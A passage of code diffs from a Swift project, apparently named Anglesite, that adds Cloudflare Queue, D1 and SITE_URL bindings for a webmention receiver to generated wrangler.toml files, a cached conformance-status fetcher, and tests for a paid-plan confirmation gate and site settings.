+        public var queueName: String?
 
-        public init(d1DatabaseID: String? = nil, kvNamespaceID: String? = nil, r2BucketName: String? = nil) {
+        public init(
+            d1DatabaseID: String? = nil, kvNamespaceID: String? = nil, r2BucketName: String? = nil,
+            queueName: String? = nil
+        ) {
             self.d1DatabaseID = d1DatabaseID
             self.kvNamespaceID = kvNamespaceID
             self.r2BucketName = r2BucketName
+            self.queueName = queueName
         }
     }
 
@@ -166,6 +174,23 @@ public enum WorkerComposition {
             } else {
                 lines.append("database_id = \"\"  # filled by provisioning")
             }
+        }
+
+        // Cloudflare Queue backing @dwk/webmention's async verify step. Queues are referenced by
+        // name (not id), so — like r2BucketName — this falls back to a deterministic
+        // `\(siteName)-webmention` placeholder before provisioning assigns the real one.
+        if hasWebmentionReceive {
+            lines.append("")
+            let queueName = resources.queueName ?? "\(siteName)-webmention"
+            lines.append("[[queues.producers]]")
+            lines.append("queue = \"\(queueName)\"")
+            lines.append("binding = \"WEBMENTION_QUEUE\"")
+            lines.append("")
+            lines.append("[[queues.consumers]]")
+            lines.append("queue = \"\(queueName)\"")
+            lines.append("max_batch_size = 10")
+            lines.append("max_batch_timeout = 30")
+            lines.append("max_retries = 3")
         }
 
         if workers.contains(where: { $0.resources.needsKV }) {

--- a/Sources/AnglesiteCore/WorkerComposition.swift
+++ b/Sources/AnglesiteCore/WorkerComposition.swift
@@ -24,6 +24,13 @@ public enum WorkerComposition {
     /// silently diverge from another.
     public static let indieauthWorkerID = "indieauth"
 
+    /// `@dwk/webmention`'s catalog id — like `indieauthWorkerID`, composition keys off this
+    /// directly for the receiver's three bespoke bindings (`WEBMENTION_INBOX`, the Queue,
+    /// `SITE_URL`), since those binding names are part of `@dwk/webmention`'s public composition
+    /// contract, not something a generic `resources` flag can express without a paired schema
+    /// change in the external `davidwkeith/workers` catalog repo.
+    public static let webmentionWorkerID = "webmention"
+
     /// The bespoke app-side inbox-capture route (#587) — not a `@dwk/workers` catalog worker, so
     /// its claim lives here rather than in `catalog.json`. Appended automatically when
     /// `generateWranglerToml` is called with `inboxCaptureEnabled`.
@@ -96,6 +103,7 @@ public enum WorkerComposition {
         // AUTH_DB block below) — the one place composition keys off a specific catalog id rather
         // than generic resource flags.
         let hasIndieauth = workers.contains(where: { $0.id == indieauthWorkerID })
+        let hasWebmentionReceive = workers.contains(where: { $0.id == webmentionWorkerID })
 
         var lines: [String] = []
         lines.append("name = \"\(siteName)\"")
@@ -138,6 +146,21 @@ public enum WorkerComposition {
             lines.append("binding = \"AUTH_DB\"")
             lines.append("database_name = \"\(siteName)-social\"")
             lines.append("migrations_dir = \"worker/migrations\"")
+            if let id = resources.d1DatabaseID, !id.isEmpty {
+                lines.append("database_id = \"\(id)\"")
+            } else {
+                lines.append("database_id = \"\"  # filled by provisioning")
+            }
+        }
+
+        // Same shared per-site D1 database as DB/AUTH_DB, bound a third time under
+        // WEBMENTION_INBOX — @dwk/webmention's createD1Inbox creates its own `webmentions`
+        // table on first use, so no separate database or migration is needed here.
+        if hasWebmentionReceive {
+            lines.append("")
+            lines.append("[[d1_databases]]")
+            lines.append("binding = \"WEBMENTION_INBOX\"")
+            lines.append("database_name = \"\(siteName)-social\"")
             if let id = resources.d1DatabaseID, !id.isEmpty {
                 lines.append("database_id = \"\(id)\"")
             } else {

--- a/Sources/AnglesiteCore/WorkerComposition.swift
+++ b/Sources/AnglesiteCore/WorkerComposition.swift
@@ -223,7 +223,7 @@ public enum WorkerComposition {
             }
         }
 
-        if hasWebmentionReceive, let siteURL, !siteURL.isEmpty {
+        if hasWebmentionReceive, let siteURL, !siteURL.isEmpty, isSafeTomlStringValue(siteURL) {
             lines.append("")
             lines.append("[vars]")
             lines.append("SITE_URL = \"\(siteURL)\"")
@@ -253,5 +253,16 @@ public enum WorkerComposition {
     static func isValidSiteName(_ siteName: String) -> Bool {
         guard !siteName.isEmpty else { return false }
         return siteName.unicodeScalars.allSatisfy { validNameCharacters.contains($0) }
+    }
+
+    /// Whether `value` is safe to interpolate as-is into a TOML basic string (`"..."`) — no
+    /// double quote, backslash, or control character that could break out of the string literal
+    /// or corrupt the generated file. `siteURL` is sourced from `.site-config`, which lives in
+    /// the site's git-tracked `Source/` — externally clonable/editable content (CLAUDE.md's "Git
+    /// is the source of truth"), so it must be treated the same as any other untrusted input
+    /// before being interpolated into generated infrastructure config.
+    static func isSafeTomlStringValue(_ value: String) -> Bool {
+        !value.contains("\"") && !value.contains("\\")
+            && !value.unicodeScalars.contains(where: { $0.value < 0x20 || $0.value == 0x7F })
     }
 }

--- a/Sources/AnglesiteCore/WorkerComposition.swift
+++ b/Sources/AnglesiteCore/WorkerComposition.swift
@@ -87,7 +87,8 @@ public enum WorkerComposition {
         routeClaims: [WorkerRouteClaim] = [],
         resources: ProvisionedResources = .init(),
         inboxCaptureEnabled: Bool = false,
-        inboxKVNamespaceID: String? = nil
+        inboxKVNamespaceID: String? = nil,
+        siteURL: String? = nil
     ) throws -> String {
         guard isValidSiteName(siteName) else {
             throw ConfigError.invalidSiteName(siteName)
@@ -220,6 +221,12 @@ public enum WorkerComposition {
             } else {
                 lines.append("id = \"\"  # filled by provisioning")
             }
+        }
+
+        if hasWebmentionReceive, let siteURL, !siteURL.isEmpty {
+            lines.append("")
+            lines.append("[vars]")
+            lines.append("SITE_URL = \"\(siteURL)\"")
         }
 
         if hasIndieauth {

--- a/Sources/AnglesiteCore/WorkersConformanceFetcher.swift
+++ b/Sources/AnglesiteCore/WorkersConformanceFetcher.swift
@@ -1,0 +1,116 @@
+import Foundation
+// URLSession/URLRequest/HTTPURLResponse live in FoundationNetworking on non-Darwin
+// platforms (swift-corelibs-foundation); this import is a no-op on macOS.
+#if canImport(FoundationNetworking)
+import FoundationNetworking
+#endif
+// OSLog is Darwin-only; AnglesiteCore is part of the Linux-portable target set (Package.swift,
+// cross-platform port design §9/§10), so logging falls back to stderr off-Darwin.
+#if canImport(OSLog)
+import OSLog
+#endif
+
+public enum WorkersConformanceFetchError: Error, Sendable, Equatable {
+    case fetchFailed(String)
+}
+
+/// Fetches, parses, and disk-caches `conformance/status.json` from the `@dwk/workers` monorepo.
+/// Network or parse failures degrade to the last successfully cached copy, then to an empty
+/// status — this is advisory-only (see `WorkerActivation.conformanceAdvisory`), so a fetch
+/// failure must never block a deploy, mirroring `WorkerCatalogFetcher`'s own degradation
+/// contract.
+public actor WorkersConformanceFetcher {
+    #if canImport(OSLog)
+    private static let logger = Logger(subsystem: "io.dwk.anglesite", category: "WorkersConformanceFetcher")
+    #endif
+
+    /// Degraded-path logging, portable off-Darwin (no OSLog on Linux — cross-platform port
+    /// design §9/§10).
+    private static func logDegradation(_ message: String) {
+        #if canImport(OSLog)
+        logger.error("\(message, privacy: .public)")
+        #else
+        FileHandle.standardError.write(Data("[WorkersConformanceFetcher] \(message)\n".utf8))
+        #endif
+    }
+
+    private let statusURL: URL
+    private let cacheURL: URL
+    private let session: URLSession
+    private let fileManager: FileManager
+
+    public init(
+        statusURL: URL,
+        cacheURL: URL = WorkersConformanceFetcher.defaultCacheURL(),
+        session: URLSession = .shared,
+        fileManager: FileManager = .default
+    ) {
+        self.statusURL = statusURL
+        self.cacheURL = cacheURL
+        self.session = session
+        self.fileManager = fileManager
+    }
+
+    /// Fetches the latest conformance status and caches the raw manifest bytes to disk on
+    /// success. On any failure (network error, non-2xx response, malformed JSON), falls back to
+    /// the last cached status; if there is no cache either, returns an empty status. Never
+    /// throws — this is advisory-only, so callers must never have to handle a failure path.
+    public func status() async -> WorkersConformanceStatus {
+        do {
+            return try await fetchAndCache()
+        } catch {
+            Self.logDegradation("status fetch failed, falling back to cache: \(error)")
+        }
+        do {
+            return try Self.readCache(cacheURL)
+        } catch {
+            Self.logDegradation("status cache read failed, falling back to empty status: \(error)")
+            return WorkersConformanceStatus(packages: [:])
+        }
+    }
+
+    private func fetchAndCache() async throws -> WorkersConformanceStatus {
+        let (data, response) = try await session.data(from: statusURL)
+        guard let http = response as? HTTPURLResponse, 200..<300 ~= http.statusCode else {
+            throw WorkersConformanceFetchError.fetchFailed("bad response from \(statusURL)")
+        }
+        let status = try WorkersConformanceReader.parse(data)
+        do {
+            try Self.writeCache(data, to: cacheURL, fileManager: fileManager)
+        } catch {
+            Self.logDegradation("status cache write failed (serving fresh data anyway): \(error)")
+        }
+        return status
+    }
+
+    private static func readCache(_ url: URL) throws -> WorkersConformanceStatus {
+        let data = try Data(contentsOf: url)
+        return try WorkersConformanceReader.parse(data)
+    }
+
+    private static func writeCache(_ data: Data, to url: URL, fileManager: FileManager) throws {
+        try fileManager.createDirectory(
+            at: url.deletingLastPathComponent(), withIntermediateDirectories: true)
+        try data.write(to: url, options: [.atomic])
+    }
+
+    /// Verified live against `davidwkeith/workers` during #359 planning (2026-07-21).
+    public static let productionStatusURL = URL(
+        string: "https://raw.githubusercontent.com/davidwkeith/workers/main/conformance/status.json"
+    )!
+
+    /// `~/Library/Application Support/Anglesite/worker-conformance-cache.json` — mirrors
+    /// `WorkerCatalogFetcher.defaultCacheURL`'s convention.
+    public static func defaultCacheURL(fileManager: FileManager = .default) -> URL {
+        let support = (try? fileManager.url(
+            for: .applicationSupportDirectory,
+            in: .userDomainMask,
+            appropriateFor: nil,
+            create: true
+        )) ?? fileManager.portableHomeDirectory
+            .appendingPathComponent("Library/Application Support", isDirectory: true)
+        return support
+            .appendingPathComponent("Anglesite", isDirectory: true)
+            .appendingPathComponent("worker-conformance-cache.json")
+    }
+}

--- a/Tests/AnglesiteCoreTests/DeployCoordinatorTests.swift
+++ b/Tests/AnglesiteCoreTests/DeployCoordinatorTests.swift
@@ -141,6 +141,33 @@ struct DeployCoordinatorTests {
         #expect(name == SiteSlug.derive(from: "site-1"))
     }
 
+    // MARK: - resolveSiteURL
+
+    @Test("resolveSiteURL prefers DOMAIN over everything else")
+    func resolveSiteURLPrefersDomain() throws {
+        let dir = try temporaryDirectory()
+        try "DOMAIN=example.com\nSITE_URL=https://my-site.workers.dev\n".write(
+            to: dir.appendingPathComponent(".site-config"), atomically: true, encoding: .utf8)
+
+        #expect(DeployCoordinator.resolveSiteURL(siteDirectory: dir) == "https://example.com")
+    }
+
+    @Test("resolveSiteURL falls back to the persisted SITE_URL when no custom domain is set")
+    func resolveSiteURLFallsBackToSiteURL() throws {
+        let dir = try temporaryDirectory()
+        try "SITE_URL=https://my-site.workers.dev\n".write(
+            to: dir.appendingPathComponent(".site-config"), atomically: true, encoding: .utf8)
+
+        #expect(DeployCoordinator.resolveSiteURL(siteDirectory: dir) == "https://my-site.workers.dev")
+    }
+
+    @Test("resolveSiteURL returns nil before any deploy has ever persisted a host")
+    func resolveSiteURLNilBeforeFirstDeploy() throws {
+        let dir = try temporaryDirectory()
+
+        #expect(DeployCoordinator.resolveSiteURL(siteDirectory: dir) == nil)
+    }
+
     // MARK: - persistProvisionedResources
 
     @Test("persists the sorted effective active set and the provisioned resources")

--- a/Tests/AnglesiteCoreTests/SiteConfigStoreTests.swift
+++ b/Tests/AnglesiteCoreTests/SiteConfigStoreTests.swift
@@ -150,4 +150,39 @@ struct SiteConfigStoreTests {
         #expect(loaded.lastDeployedWorkerIDs == nil)
         #expect(loaded.provisionedWorkerResources == nil)
     }
+
+    @Test("webmentionReceivePaidPlanAcknowledged round-trips through save/load")
+    func webmentionPaidPlanFlagRoundTrips() async throws {
+        let dir = try tempConfigDir()
+        defer { try? FileManager.default.removeItem(at: dir.deletingLastPathComponent()) }
+        let store = SiteConfigStore(configDirectory: dir)
+
+        let settings = SiteSettings(webmentionReceivePaidPlanAcknowledged: true)
+        try await store.save(settings)
+
+        let loaded = try await store.load()
+        #expect(loaded.webmentionReceivePaidPlanAcknowledged == true)
+    }
+
+    @Test("a settings.plist written before webmentionReceivePaidPlanAcknowledged existed still decodes (forward-compat)")
+    func decodesOldPlistWithoutPaidPlanField() async throws {
+        let dir = try tempConfigDir()
+        defer { try? FileManager.default.removeItem(at: dir.deletingLastPathComponent()) }
+        // Simulates a plist written by a build that predates this field.
+        let oldFormat = """
+        <?xml version="1.0" encoding="UTF-8"?>
+        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        <plist version="1.0">
+        <dict>
+            <key>displayName</key>
+            <string>My Site</string>
+        </dict>
+        </plist>
+        """
+        try oldFormat.write(to: dir.appendingPathComponent("settings.plist"), atomically: true, encoding: .utf8)
+        let store = SiteConfigStore(configDirectory: dir)
+
+        let loaded = try await store.load()
+        #expect(loaded.webmentionReceivePaidPlanAcknowledged == nil)
+    }
 }

--- a/Tests/AnglesiteCoreTests/SiteOperationsTests.swift
+++ b/Tests/AnglesiteCoreTests/SiteOperationsTests.swift
@@ -157,19 +157,20 @@ struct SiteOperationsTests {
 
         let result = await ops.provisionSocialWorker(site: site)
 
-        guard case .succeeded(let url, let resources, _) = result else {
-            Issue.record("expected success, got \(result)")
+        // The fixed V-2 starter pack's "webmention" worker id is `@dwk/webmention`'s catalog id
+        // (`WorkerComposition.webmentionWorkerID`), which also carries inbound receive — so this
+        // call now parks on the Cloudflare Queues paid-plan confirmation gate (#359) before ever
+        // creating the Queue or deploying. D1/KV are still provisioned first (both webmention and
+        // indieauth need them), so their ids are already in `resources` when the gate returns.
+        guard case .webmentionPaidPlanConfirmationNeeded(let resources) = result else {
+            Issue.record("expected webmentionPaidPlanConfirmationNeeded, got \(result)")
             return
         }
-        #expect(url == URL(string: "https://blue-bottle-cafe.example.workers.dev"))
         #expect(await recorder.arguments == [
             ["d1", "create", "blue-bottle-cafe-social", "--json"],
             ["kv", "namespace", "create", "blue-bottle-cafe-social", "--json"],
-            ["d1", "migrations", "apply", "AUTH_DB", "--remote"],
         ])
-        #expect(await recorder.deployCalls == [
-            .init(token: "token", siteID: "s1", siteDirectory: package.appendingPathComponent("Source", isDirectory: true))
-        ])
+        #expect(await recorder.deployCalls.isEmpty)
         #expect(resources.d1DatabaseID == "d1-id")
         #expect(resources.kvNamespaceID == "kv-id")
     }
@@ -189,14 +190,17 @@ struct SiteOperationsTests {
 
         let result = await ops.provisionSocialWorker(site: site)
 
-        guard case .succeeded = result else {
-            Issue.record("expected success, got \(result)")
+        // As in `socialWorkerProvisionOperation` above, the starter pack's real "webmention" id
+        // now parks on the paid-plan confirmation gate (#359) before the IndieAuth migration step
+        // or deploy — so D1/KV are provisioned but the AUTH_DB migration never runs.
+        guard case .webmentionPaidPlanConfirmationNeeded = result else {
+            Issue.record("expected webmentionPaidPlanConfirmationNeeded, got \(result)")
             return
         }
         let arguments = await recorder.arguments
         #expect(arguments.contains(["d1", "create", "blue-bottle-cafe-social", "--json"]))
         #expect(arguments.contains(["kv", "namespace", "create", "blue-bottle-cafe-social", "--json"]))
-        #expect(arguments.contains(["d1", "migrations", "apply", "AUTH_DB", "--remote"]))
+        #expect(!arguments.contains(["d1", "migrations", "apply", "AUTH_DB", "--remote"]))
         let toml = try String(
             contentsOf: package.appendingPathComponent("Source/wrangler.toml"), encoding: .utf8)
         #expect(!toml.contains("[[r2_buckets]]"))

--- a/Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift
+++ b/Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift
@@ -24,12 +24,16 @@ struct SocialWorkerProvisionCommandTests {
         let recorder = WranglerRecorder([
             ["d1", "create", "my-site-social", "--json"]: .init(stdout: #"{"result":{"uuid":"d1-id"}}"#, stderr: "", exitCode: 0),
             ["kv", "namespace", "create", "my-site-social", "--json"]: .init(stdout: #"{"result":{"id":"kv-id"}}"#, stderr: "", exitCode: 0),
+            ["queues", "create", "my-site-webmention", "--json"]: .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0),
             ["d1", "migrations", "apply", "AUTH_DB", "--remote"]: .init(stdout: "Migrations applied", stderr: "", exitCode: 0),
         ])
         let deployer = DeployRecorder(result: .succeeded(url: URL(string: "https://my-site.example.workers.dev")!, duration: 1))
         let command = SocialWorkerProvisionCommand(tokenSource: { "token" }, runner: recorder.runner, deployer: deployer.deployer)
 
-        let result = await command.provision(siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers)
+        let result = await command.provision(
+            siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers,
+            acknowledgesPaidPlan: true
+        )
 
         guard case .succeeded(let url, let resources, _) = result else {
             Issue.record("expected success, got \(result)")
@@ -39,9 +43,11 @@ struct SocialWorkerProvisionCommandTests {
         #expect(resources.d1DatabaseID == "d1-id")
         #expect(resources.kvNamespaceID == "kv-id")
         #expect(resources.r2BucketName == nil)
+        #expect(resources.queueName == "my-site-webmention")
         #expect(await recorder.arguments == [
             ["d1", "create", "my-site-social", "--json"],
             ["kv", "namespace", "create", "my-site-social", "--json"],
+            ["queues", "create", "my-site-webmention", "--json"],
             ["d1", "migrations", "apply", "AUTH_DB", "--remote"],
         ])
         #expect(await recorder.environments.allSatisfy { $0["CLOUDFLARE_API_TOKEN"] == "token" })
@@ -61,6 +67,7 @@ struct SocialWorkerProvisionCommandTests {
             ["d1", "create", "my-site-social", "--json"]: .init(stdout: #"{"uuid":"d1-id"}"#, stderr: "", exitCode: 0),
             ["kv", "namespace", "create", "my-site-social", "--json"]: .init(stdout: #"{"id":"kv-id"}"#, stderr: "", exitCode: 0),
             ["r2", "bucket", "create", "my-site-media"]: .init(stdout: "Created bucket my-site-media", stderr: "", exitCode: 0),
+            ["queues", "create", "my-site-webmention", "--json"]: .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0),
             ["d1", "migrations", "apply", "AUTH_DB", "--remote"]: .init(stdout: "Migrations applied", stderr: "", exitCode: 0),
         ])
         let command = SocialWorkerProvisionCommand(
@@ -73,7 +80,8 @@ struct SocialWorkerProvisionCommandTests {
             siteID: "site-1",
             siteDirectory: site,
             siteName: "my-site",
-            workers: v3Workers
+            workers: v3Workers,
+            acknowledgesPaidPlan: true
         )
 
         guard case .succeeded(_, let resources, _) = result else {
@@ -174,6 +182,7 @@ struct SocialWorkerProvisionCommandTests {
         let recorder = WranglerRecorder([
             ["d1", "create", "my-site-social", "--json"]: .init(stdout: #"{"uuid":"d1-id"}"#, stderr: "", exitCode: 0),
             ["kv", "namespace", "create", "my-site-social", "--json"]: .init(stdout: #"{"id":"kv-id"}"#, stderr: "", exitCode: 0),
+            ["queues", "create", "my-site-webmention", "--json"]: .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0),
             ["d1", "migrations", "apply", "AUTH_DB", "--remote"]: .init(stdout: "Migrations applied", stderr: "", exitCode: 0),
         ])
         let command = SocialWorkerProvisionCommand(
@@ -182,7 +191,10 @@ struct SocialWorkerProvisionCommandTests {
             deployer: DeployRecorder(result: .failed(reason: "pre-deploy scan could not run", exitCode: nil)).deployer
         )
 
-        let result = await command.provision(siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers)
+        let result = await command.provision(
+            siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers,
+            acknowledgesPaidPlan: true
+        )
 
         guard case .failed(let reason, nil, let resources) = result else {
             Issue.record("expected deploy failure, got \(result)")
@@ -203,12 +215,16 @@ struct SocialWorkerProvisionCommandTests {
         let recorder = WranglerRecorder([
             ["d1", "create", "my-site-social", "--json"]: .init(stdout: #"{"result":{"uuid":"d1-id"}}"#, stderr: "", exitCode: 0),
             ["kv", "namespace", "create", "my-site-social", "--json"]: .init(stdout: #"{"result":{"id":"kv-id"}}"#, stderr: "", exitCode: 0),
+            ["queues", "create", "my-site-webmention", "--json"]: .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0),
             ["d1", "migrations", "apply", "AUTH_DB", "--remote"]: .init(stdout: "Migrations applied", stderr: "", exitCode: 0),
         ])
         let deployer = DeployRecorder(result: .workerNameConflict(name: "taken-name"))
         let command = SocialWorkerProvisionCommand(tokenSource: { "token" }, runner: recorder.runner, deployer: deployer.deployer)
 
-        let result = await command.provision(siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers)
+        let result = await command.provision(
+            siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers,
+            acknowledgesPaidPlan: true
+        )
 
         guard case .workerNameConflict(let name, let resources) = result else {
             Issue.record("expected .workerNameConflict, got \(result)"); return
@@ -224,12 +240,16 @@ struct SocialWorkerProvisionCommandTests {
         let recorder = WranglerRecorder([
             ["d1", "create", "my-site-social", "--json"]: .init(stdout: #"{"uuid":"d1-id"}"#, stderr: "", exitCode: 0),
             ["kv", "namespace", "create", "my-site-social", "--json"]: .init(stdout: #"{"id":"kv-id"}"#, stderr: "", exitCode: 0),
+            ["queues", "create", "my-site-webmention", "--json"]: .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0),
             ["d1", "migrations", "apply", "AUTH_DB", "--remote"]: .init(stdout: "Migration failed", stderr: "", exitCode: 1),
         ])
         let deployer = DeployRecorder(result: .succeeded(url: URL(string: "https://my-site.example.workers.dev")!, duration: 1))
         let command = SocialWorkerProvisionCommand(tokenSource: { "token" }, runner: recorder.runner, deployer: deployer.deployer)
 
-        let result = await command.provision(siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers)
+        let result = await command.provision(
+            siteID: "site-1", siteDirectory: site, siteName: "my-site", workers: v2Workers,
+            acknowledgesPaidPlan: true
+        )
 
         guard case .failed(let reason, let exitCode, let resources) = result else {
             Issue.record("expected migration failure, got \(result)")
@@ -347,6 +367,92 @@ struct SocialWorkerProvisionCommandTests {
             reason: "KV failed", exitCode: 1, resources: .init(d1DatabaseID: "d1-id")
         )
         #expect(result.asDeployCommandResult == .failed(reason: "KV failed", exitCode: 1))
+    }
+
+    @Test("webmention worker without paid-plan acknowledgment returns webmentionPaidPlanConfirmationNeeded, no wrangler call")
+    func webmentionWithoutAcknowledgmentBlocksBeforeAnyCall() async throws {
+        let site = try temporaryDirectory()
+        var calledArguments: [[String]] = []
+        let command = SocialWorkerProvisionCommand(
+            tokenSource: { "tok" },
+            runner: { _, arguments, _, _ in
+                calledArguments.append(arguments)
+                return .init(stdout: "", stderr: "unexpected call", exitCode: 1)
+            },
+            deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+        )
+        let webmention = WorkerDescriptor(
+            id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+            binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+        let result = await command.provision(
+            siteID: "site-1", siteDirectory: site, siteName: "my-site",
+            workers: [webmention], acknowledgesPaidPlan: false)
+
+        guard case .webmentionPaidPlanConfirmationNeeded = result else {
+            Issue.record("expected .webmentionPaidPlanConfirmationNeeded, got \(result)")
+            return
+        }
+        #expect(calledArguments.isEmpty, "must not call wrangler before the user acknowledges the paid-plan requirement")
+    }
+
+    @Test("webmention worker with acknowledgment creates the queue")
+    func webmentionWithAcknowledgmentCreatesQueue() async throws {
+        let site = try temporaryDirectory()
+        var calledArguments: [[String]] = []
+        let command = SocialWorkerProvisionCommand(
+            tokenSource: { "tok" },
+            runner: { _, arguments, _, _ in
+                calledArguments.append(arguments)
+                if arguments.first == "queues" {
+                    return .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0)
+                }
+                return .init(stdout: "", stderr: "", exitCode: 0)
+            },
+            deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+        )
+        let webmention = WorkerDescriptor(
+            id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+            binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+        let result = await command.provision(
+            siteID: "site-1", siteDirectory: site, siteName: "my-site",
+            workers: [webmention], acknowledgesPaidPlan: true)
+
+        guard case .succeeded(_, let resources, _) = result else {
+            Issue.record("expected .succeeded, got \(result)")
+            return
+        }
+        #expect(resources.queueName == "my-site-webmention")
+        #expect(calledArguments.contains(["queues", "create", "my-site-webmention", "--json"]))
+    }
+
+    @Test("an already-provisioned queue is not re-created")
+    func alreadyProvisionedQueueSkipsCreation() async throws {
+        let site = try temporaryDirectory()
+        var calledArguments: [[String]] = []
+        let command = SocialWorkerProvisionCommand(
+            tokenSource: { "tok" },
+            runner: { _, arguments, _, _ in
+                calledArguments.append(arguments)
+                return .init(stdout: "", stderr: "", exitCode: 0)
+            },
+            deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+        )
+        let webmention = WorkerDescriptor(
+            id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+            binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+        let result = await command.provision(
+            siteID: "site-1", siteDirectory: site, siteName: "my-site",
+            workers: [webmention], knownResources: .init(queueName: "my-site-webmention"),
+            acknowledgesPaidPlan: true)
+
+        guard case .succeeded = result else {
+            Issue.record("expected .succeeded, got \(result)")
+            return
+        }
+        #expect(!calledArguments.contains(where: { $0.first == "queues" }))
     }
 
     private func temporaryDirectory() throws -> URL {

--- a/Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift
+++ b/Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift
@@ -455,6 +455,31 @@ struct SocialWorkerProvisionCommandTests {
         #expect(!calledArguments.contains(where: { $0.first == "queues" }))
     }
 
+    @Test("webmention receive writes WEBMENTION_RECEIVE_ENABLED into .site-config")
+    func webmentionWritesReceiveEnabledFlag() async throws {
+        let siteDirectory = try temporaryDirectory()
+        let command = SocialWorkerProvisionCommand(
+            tokenSource: { "tok" },
+            runner: { _, arguments, _, _ in
+                if arguments.first == "queues" {
+                    return .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0)
+                }
+                return .init(stdout: "", stderr: "", exitCode: 0)
+            },
+            deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+        )
+        let webmention = WorkerDescriptor(
+            id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+            binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+        _ = await command.provision(
+            siteID: "site-1", siteDirectory: siteDirectory, siteName: "my-site",
+            workers: [webmention], acknowledgesPaidPlan: true)
+
+        let config = try String(contentsOf: siteDirectory.appendingPathComponent(".site-config"), encoding: .utf8)
+        #expect(SiteConfigFile.value(forKey: "WEBMENTION_RECEIVE_ENABLED", in: config) == "true")
+    }
+
     private func temporaryDirectory() throws -> URL {
         let url = FileManager.default.temporaryDirectory
             .appendingPathComponent("SocialWorkerProvisionCommandTests-\(UUID().uuidString)", isDirectory: true)

--- a/Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift
+++ b/Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift
@@ -480,6 +480,71 @@ struct SocialWorkerProvisionCommandTests {
         #expect(SiteConfigFile.value(forKey: "WEBMENTION_RECEIVE_ENABLED", in: config) == "true")
     }
 
+    @Test("deactivating webmention reconciles WEBMENTION_RECEIVE_ENABLED back to false")
+    func webmentionDeactivationReconcilesFlagToFalse() async throws {
+        let siteDirectory = try temporaryDirectory()
+        let command = SocialWorkerProvisionCommand(
+            tokenSource: { "tok" },
+            runner: { _, arguments, _, _ in
+                if arguments.first == "queues" {
+                    return .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0)
+                }
+                return .init(stdout: "", stderr: "", exitCode: 0)
+            },
+            deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+        )
+        let webmention = WorkerDescriptor(
+            id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+            binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+        _ = await command.provision(
+            siteID: "site-1", siteDirectory: siteDirectory, siteName: "my-site",
+            workers: [webmention], acknowledgesPaidPlan: true)
+
+        let enabledConfig = try String(contentsOf: siteDirectory.appendingPathComponent(".site-config"), encoding: .utf8)
+        #expect(SiteConfigFile.value(forKey: "WEBMENTION_RECEIVE_ENABLED", in: enabledConfig) == "true")
+
+        _ = await command.provision(
+            siteID: "site-1", siteDirectory: siteDirectory, siteName: "my-site",
+            workers: [], acknowledgesPaidPlan: true)
+
+        let disabledConfig = try String(contentsOf: siteDirectory.appendingPathComponent(".site-config"), encoding: .utf8)
+        #expect(SiteConfigFile.value(forKey: "WEBMENTION_RECEIVE_ENABLED", in: disabledConfig) == "false")
+    }
+
+    @Test("cancelling the paid-plan gate never lets WEBMENTION_RECEIVE_ENABLED reach true")
+    func webmentionPaidPlanGateCancelKeepsFlagFalse() async throws {
+        let siteDirectory = try temporaryDirectory()
+        let command = SocialWorkerProvisionCommand(
+            tokenSource: { "tok" },
+            runner: { _, arguments, _, _ in
+                #expect(arguments.first != "queues", "must not create the Queue before the paid-plan gate is acknowledged")
+                if arguments.first == "d1" {
+                    return .init(stdout: #"{"result":{"uuid":"d1-id"}}"#, stderr: "", exitCode: 0)
+                }
+                return .init(stdout: "", stderr: "", exitCode: 0)
+            },
+            deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+        )
+        // needsD1: true so the D1 block's persistConfig call runs (and reconciles the flag to
+        // "false") before the code reaches the paid-plan gate below it — mirrors production,
+        // where webmention's real WorkerComposition resources need D1 for the inbox table.
+        let webmention = WorkerDescriptor(
+            id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+            binding: .settingsActivated, resources: .init(needsD1: true, needsKV: false, needsR2: false))
+
+        let result = await command.provision(
